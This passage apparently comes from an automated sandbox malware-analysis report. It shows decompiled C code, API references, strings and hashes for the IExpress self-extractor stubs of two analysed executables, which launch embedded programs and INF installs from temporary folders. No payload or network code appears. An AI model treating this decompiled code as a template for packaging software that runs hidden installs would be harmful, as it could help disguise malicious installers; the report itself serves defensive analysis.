					E010644B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x1068584; // 0x0
				E010644B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x010647e8
0x010647f0
0x010647f4
0x0106480f
0x01064811
0x01064814
0x01064814
0x01064816
0x01064817
0x01064829
0x0106482b
0x0106482f
0x0106484f
0x01064852
0x01064855
0x01064855
0x01064857
0x01064858
0x01064860
0x01064865
0x0106486a
0x0106486f
0x00000000
0x01064876
0x01064831
0x01064841
0x01064847
0x0106480b
0x00000000
0x0106480b
0x010647f6
0x01064806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,01064E6F), ref: 010647EA
LocalAlloc.KERNEL32(00000040,?), ref: 01064823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 01064847

Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01064851

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 359063898-2356899610
Opcode ID: 77e4aa08d796841f3b6b686c5fd0e2ca0828bdc895d1a5daf2b188161e069367
Instruction ID: b78da12180b7fb1cdaf7b72ade0b1fd1013bf0919f25f6e1d19298777b28405f
Opcode Fuzzy Hash: 77e4aa08d796841f3b6b686c5fd0e2ca0828bdc895d1a5daf2b188161e069367
Instruction Fuzzy Hash: CF1159B4600701EFD7759E249808F7A3B9EEBC5300B048459EEC2DB345CA3AC806C720

Uniqueness

Uniqueness Score: -1.00%

Function 01066517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01066517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x1069a3c; // 0x1060000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E010644B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x0106651f
0x0106652a
0x01066534
0x0106656b
0x01066577
0x0106657c
0x01066536
0x0106653e
0x01066542
0x00000000
0x01066544
0x01066547
0x0106654c
0x01066549
0x01066549
0x01066549
0x0106655e
0x01066560
0x01066569
0x00000000
0x00000000
0x01066569
0x01066542
0x01066587

APIs

FindResourceA.KERNEL32(01060000,000007D6,00000005), ref: 0106652A
LoadResource.KERNEL32(01060000,00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01066538
DialogBoxIndirectParamA.USER32(01060000,00000000,00000547,010619E0,00000000), ref: 01066557
FreeResource.KERNEL32(00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01066560

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 2997f4554da6f0a4323611b836627d7283fd2c19fdc202431d3fe0576ce9b6df
Instruction ID: f4646413425b37d3f87f77674cad0ae5bd5cc0ae677bfe4f33e88c13049a946f
Opcode Fuzzy Hash: 2997f4554da6f0a4323611b836627d7283fd2c19fdc202431d3fe0576ce9b6df
Instruction Fuzzy Hash: 5D01D672200615FBDB216E699C49DBB7AACEB85761F000165FE90E3154DB77CD5087A0

Uniqueness

Uniqueness Score: -1.00%

Function 01063680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01063680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0106368c
0x0106368f
0x01063691
0x0106369f
0x010636a7
0x00000000
0x00000000
0x010636ba
0x00000000
0x010636bc
0x010636bc
0x010636c0
0x010636cb
0x010636c2
0x010636c4
0x010636c4
0x010636da
0x010636e0
0x010636e6
0x00000000
0x00000000
0x010636e6
0x00000000
0x010636ba
0x010636ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0106369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010636B2
DispatchMessageA.USER32(?), ref: 010636CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010636DA

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 4e0c0ac79626bbaae42165775a2aca39824b949f9d3f6906e76395f5b152f14d
Instruction ID: 336c0a9dedbf4e4d09bfe48ce8e6d50d1add0edd21b496b45c1be514417dc89d
Opcode Fuzzy Hash: 4e0c0ac79626bbaae42165775a2aca39824b949f9d3f6906e76395f5b152f14d
Instruction Fuzzy Hash: 2C018472A00215BBDB305AAA5C48EEB7ABCFB89B10F004159FA49EA184D5658940C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 010665E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E010665E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x010665e8
0x010665ed
0x010665ef
0x010665f2
0x010665f4
0x010665f4
0x010665f6
0x010665f7
0x01066608
0x01066611
0x01066618
0x0106661c
0x00000000
0x00000000
0x0106660e
0x01066623
0x01066625
0x0106663b
0x0106663b
0x0106663d
0x01066641
0x01066610
0x01066610
0x00000000
0x01066610
0x01066644
0x01066647
0x01066647
0x01066621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,01062B33), ref: 01066602
CharPrevA.USER32(?,00000000), ref: 01066612
CharPrevA.USER32(?,00000000), ref: 01066629
CharNextA.USER32(00000000), ref: 01066635

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 91d3f32b8d45ba0c1efc340c2b1e2ef844b1df0c8bd145598b8dffa042e35e6b
Instruction ID: e61d4781e7ddf48ecdda1479b87e862d76a91a7f1b07f28f09df94f92f574d00
Opcode Fuzzy Hash: 91d3f32b8d45ba0c1efc340c2b1e2ef844b1df0c8bd145598b8dffa042e35e6b
Instruction Fuzzy Hash: 41F0F432104150AEE7331A2CA8888BBBFDCDB8B19471901EFF8D1A7101D66B0D068B61

Uniqueness

Uniqueness Score: -1.00%

Function 010669B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010669B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x10681f8 = E01066C70();
				__set_app_type(E01066FBE(2));
				 *0x10688a4 =  *0x10688a4 | 0xffffffff;
				 *0x10688a8 =  *0x10688a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x1068528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x106851c; // 0x0
				 *_t5 = _t12;
				_t6 = E01067000();
				if( *0x1068000 == 0) {
					__setusermatherr(E01067000);
				}
				E010671EF(_t6);
				return 0;
			}

0x010669b7
0x010669c2
0x010669c8
0x010669cf
0x010669d8
0x010669de
0x010669e4
0x010669e6
0x010669ec
0x010669f2
0x010669f4
0x01066a00
0x01066a07
0x01066a0d
0x01066a0e
0x01066a15

APIs

Part of subcall function 01066FBE: GetModuleHandleW.KERNEL32(00000000), ref: 01066FC5

__set_app_type.MSVCRT ref: 010669C2
__p__fmode.MSVCRT ref: 010669D8
__p__commode.MSVCRT ref: 010669E6
__setusermatherr.MSVCRT ref: 01066A07

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: fff6f6c3fa6415abd6fbf89c37cfd63ae8bebf2ebd7a0d3b8a0ab4fef204fed0
Instruction ID: 999985d7539846011194728d39012ca23cb5de0615650ee483e40437d5439999
Opcode Fuzzy Hash: fff6f6c3fa6415abd6fbf89c37cfd63ae8bebf2ebd7a0d3b8a0ab4fef204fed0
Instruction Fuzzy Hash: F4F09274688312CFD779AF38E5196583BA9FB44335B10865AE4E29A2E8CF3F85508F10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: will3629.exePID: 5480, Parent PID: 5504COMMON

Execution Graph

Execution Coverage:	28.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	961
Total number of Limit Nodes:	25

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00AC3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00AC3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0xac8004; // 0xc32e3ded
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0xac9124 =  *0xac9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0xac8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0xac8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E00AC468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E00AC44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0xac9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00AC1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00AC6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00AC3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0xac8580;
													if( *0xac8580 != 0) {
														E00AC2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0xac8180;
											if( *0xac8180 == 0) {
												_t146 = 0x4c7;
												E00AC44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0xac9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0xac9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00AC6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E00AC44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0xac9124 = E00AC6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E00AC44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0xac8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0xac9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0xac8a38 & 0x0000ffff;
											_v380 = 0xac9154;
											_v376 = _t151;
											_v372 = 0xac91e4;
											_v360 = _t97;
											if( *0xac8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0xac9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0xac8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0xac9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0xaca288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0xac9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0xac9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0xac8a20;
										if( *0xac8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E00AC202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E00AC468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0xac8c42;
									if( *0xac8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0xac8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E00AC468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00AC468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00AC1781( &_v276, 0x104, _t130, 0xac8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00AC468F(_t130, 0xac9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00ac3baa
0x00ac3bb0
0x00ac3bb7
0x00ac3bc0
0x00ac3bc2
0x00ac3bc9
0x00ac3bcb
0x00ac3bcf
0x00ac3bd3
0x00ac3bd9
0x00ac3bfd
0x00ac3bfd
0x00ac3bff
0x00ac3c03
0x00ac3c03
0x00ac3c11
0x00ac3c16
0x00ac3c19
0x00ac3c28
0x00000000
0x00000000
0x00ac3c30
0x00ac3c39
0x00ac3c40
0x00ac3d13
0x00ac3d15
0x00ac3d21
0x00ac3d26
0x00000000
0x00ac3c4f
0x00ac3c56
0x00ac3c60
0x00ac3c65
0x00ac3c77
0x00ac3c78
0x00ac3c7c
0x00ac3c7e
0x00ac3c82
0x00ac3c82
0x00000000
0x00ac3c7c
0x00ac3c67
0x00ac3c69
0x00ac3c6d
0x00000000
0x00ac3c58
0x00ac3c58
0x00ac3c6e
0x00ac3c6e
0x00ac3c87
0x00ac3c89
0x00ac3d4d
0x00ac3d4f
0x00ac3d50
0x00ac3d52
0x00ac3d9e
0x00ac3da8
0x00ac3daf
0x00ac3db4
0x00ac3db6
0x00ac3f4d
0x00ac3f4d
0x00ac3f4f
0x00ac3f56
0x00ac3f57
0x00ac3f58
0x00ac3f63
0x00ac3f63
0x00ac3dbc
0x00ac3dc0
0x00ac3dc2
0x00ac3de6
0x00ac3de6
0x00ac3de8
0x00ac3f0b
0x00ac3f0b
0x00ac3f0f
0x00ac3f13
0x00ac3f15
0x00ac3f1a
0x00ac3f1c
0x00ac3f46
0x00ac3f47
0x00000000
0x00ac3f47
0x00ac3f1e
0x00ac3f1f
0x00ac3f25
0x00ac3f26
0x00ac3f2a
0x00ac3f2d
0x00ac3fd9
0x00ac3fd9
0x00ac3fda
0x00ac3fda
0x00ac3fe1
0x00ac3fe3
0x00ac3fe3
0x00ac3fe8
0x00000000
0x00ac3fe8
0x00ac3f33
0x00ac3f37
0x00000000
0x00ac3f37
0x00ac3dee
0x00ac3dee
0x00ac3df5
0x00ac3fad
0x00ac3fb9
0x00ac3fc2
0x00ac3fc8
0x00000000
0x00ac3fc8
0x00ac3dfb
0x00ac3dfd
0x00000000
0x00000000
0x00ac3e03
0x00ac3e0a
0x00000000
0x00000000
0x00ac3e15
0x00ac3e17
0x00ac3e19
0x00ac3f94
0x00ac3fa4
0x00ac3f7c
0x00ac3f80
0x00ac3f8b
0x00000000
0x00ac3f8b
0x00ac3e2c
0x00ac3e30
0x00ac3e34
0x00ac3e36
0x00ac3f69
0x00ac3f6e
0x00ac3f70
0x00ac3f76
0x00000000
0x00ac3f76
0x00ac3e3c
0x00ac3e43
0x00ac3e47
0x00ac3e52
0x00ac3e56
0x00ac3e5c
0x00ac3e61
0x00ac3e68
0x00ac3e70
0x00ac3e74
0x00ac3e7c
0x00ac3e80
0x00ac3e82
0x00ac3e82
0x00ac3e87
0x00ac3e87
0x00ac3e8b
0x00ac3e91
0x00ac3e94
0x00ac3e96
0x00ac3e96
0x00ac3e9b
0x00ac3e9b
0x00ac3e9f
0x00ac3ea2
0x00ac3ea4
0x00ac3ea4
0x00ac3ea9
0x00ac3ea9
0x00ac3ead
0x00ac3eb3
0x00ac3eb6
0x00ac3eb8
0x00ac3eb8
0x00ac3ebd
0x00ac3ebd
0x00ac3ec1
0x00ac3ec3
0x00ac3ec5
0x00ac3ec5
0x00ac3eca
0x00ac3eca
0x00ac3ece
0x00ac3ed5
0x00ac3ed9
0x00ac3ee0
0x00ac3ee6
0x00ac3eea
0x00ac3eec
0x00ac3eee
0x00ac3ef3
0x00ac3ef3
0x00ac3ef5
0x00ac3efa
0x00ac3efb
0x00ac3efd
0x00ac3f40
0x00000000
0x00ac3eff
0x00ac3eff
0x00ac3f05
0x00000000
0x00ac3f05
0x00ac3efd
0x00ac3dc7
0x00ac3dce
0x00000000
0x00000000
0x00ac3dd0
0x00ac3dd7
0x00000000
0x00000000
0x00ac3dd9
0x00ac3ddb
0x00000000
0x00000000
0x00ac3ddd
0x00ac3de1
0x00000000
0x00ac3de1
0x00ac3d59
0x00ac3d65
0x00ac3d6a
0x00ac3d6c
0x00000000
0x00000000
0x00ac3d6e
0x00ac3d75
0x00000000
0x00000000
0x00ac3d8f
0x00ac3d96
0x00ac3d98
0x00000000
0x00000000
0x00000000
0x00ac3d98
0x00ac3c8f
0x00ac3c98
0x00ac3cf1
0x00ac3cf3
0x00000000
0x00000000
0x00ac3cfe
0x00ac3d11
0x00000000
0x00000000
0x00000000
0x00ac3d11
0x00ac3c9c
0x00ac3ca5
0x00ac3ca7
0x00000000
0x00000000
0x00ac3cad
0x00ac3cb2
0x00ac3cb7
0x00ac3cc5
0x00000000
0x00000000
0x00ac3ce8
0x00ac3cec
0x00ac3ced
0x00ac3ced
0x00000000
0x00ac3ce8
0x00ac3c9e
0x00000000
0x00ac3c9e
0x00ac3c56
0x00ac3d35
0x00ac3d35
0x00ac3d3c
0x00ac3d48
0x00000000
0x00ac3d48
0x00ac3c03
0x00ac3be2
0x00ac3be7
0x00ac3bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00AC3C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00AC3CDC

Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00AC8C42), ref: 00AC3D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00AC3E26
FreeLibrary.KERNEL32(00000000,?,00AC8C42), ref: 00AC3EFF
LocalFree.KERNEL32(?,?,?,?,00AC8C42), ref: 00AC3F1F
FreeLibrary.KERNEL32(00000000,?,00AC8C42), ref: 00AC3F40
LocalFree.KERNEL32(?,?,?,?,00AC8C42), ref: 00AC3F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00AC8C42), ref: 00AC3F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00AC8C42), ref: 00AC3F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00AC8C42), ref: 00AC3FC2

Strings

SHOWWINDOW, xrefs: 00AC3C34
ADMQCMD, xrefs: 00AC3C9E
POSTRUNPROGRAM, xrefs: 00AC3D60
D, xrefs: 00AC3C19
RUNPROGRAM, xrefs: 00AC3D05
DoInfInstall, xrefs: 00AC3E1F, 00AC3E24, 00AC3F68
lega, xrefs: 00AC3E68
USRQCMD, xrefs: 00AC3CAD
advpack.dll, xrefs: 00AC3F9D
<None>, xrefs: 00AC3CC9, 00AC3D7D
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC3E74
REBOOT, xrefs: 00AC3BE2

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
